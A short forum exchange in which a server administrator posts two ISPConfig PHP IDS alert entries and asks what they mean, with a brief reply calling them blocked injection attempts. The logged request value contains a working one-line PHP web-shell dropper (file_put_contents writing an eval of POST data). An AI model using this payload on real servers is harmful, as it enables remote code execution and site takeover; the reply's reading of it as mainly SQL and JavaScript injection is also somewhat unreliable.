Hi, i'm found this errors in the ispconfig log Expand: 2020-04-06 13:53 [INTERFACE]: PHP IDS Alert.Total impact: 35<br/> Affected tags: sqli, id, lfi, xss, csrf, rfe<br/> <br/> Variable: GET.prefix | Value: ''<br/> Impact: 6 | Tags: sqli, id, lfi<br/> Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID 42<br/> <br/> Variable: GET.content | Value: <php>file_put_contents('spread.php','<?php @eval($_POST[spread]);?>')<br/> Impact: 29 | Tags: xss, csrf, sqli, id, lfi, rfe<br/> Description: Finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID 1<br/> Description: Detects self-executing JavaScript functions | Tags: xss, csrf | ID 8<br/> Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID 43<br/> Description: Detects code injection attempts 1/3 | Tags: id, rfe, lfi | ID 58<br/> Description: Detects code injection attempts 2/3 | Tags: id, rfe, lfi | ID 59<br/> <br/> Expand: 2020-04-06 12:31 [INTERFACE]: PHP IDS Alert.Total impact: 35<br/> Affected tags: sqli, id, lfi, xss, csrf, rfe<br/> <br/> Variable: GET.prefix | Value: ''<br/> Impact: 6 | Tags: sqli, id, lfi<br/> Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID 42<br/> <br/> Variable: GET.content | Value: <php>file_put_contents('spread.php','<?php @eval($_POST[spread]);?>')<br/> Impact: 29 | Tags: xss, csrf, sqli, id, lfi, rfe<br/> Description: Finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID 1<br/> Description: Detects self-executing JavaScript functions | Tags: xss, csrf | ID 8<br/> Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID 43<br/> Description: Detects code injection attempts 1/3 | Tags: id, rfe, lfi | ID 58<br/> Description: Detects code injection attempts 2/3 | Tags: id, rfe, lfi | ID 59<br/> <br/> What does it mean ?
Someone probably tried to do an SQL and JS injection on your server and this has been detected and prevented.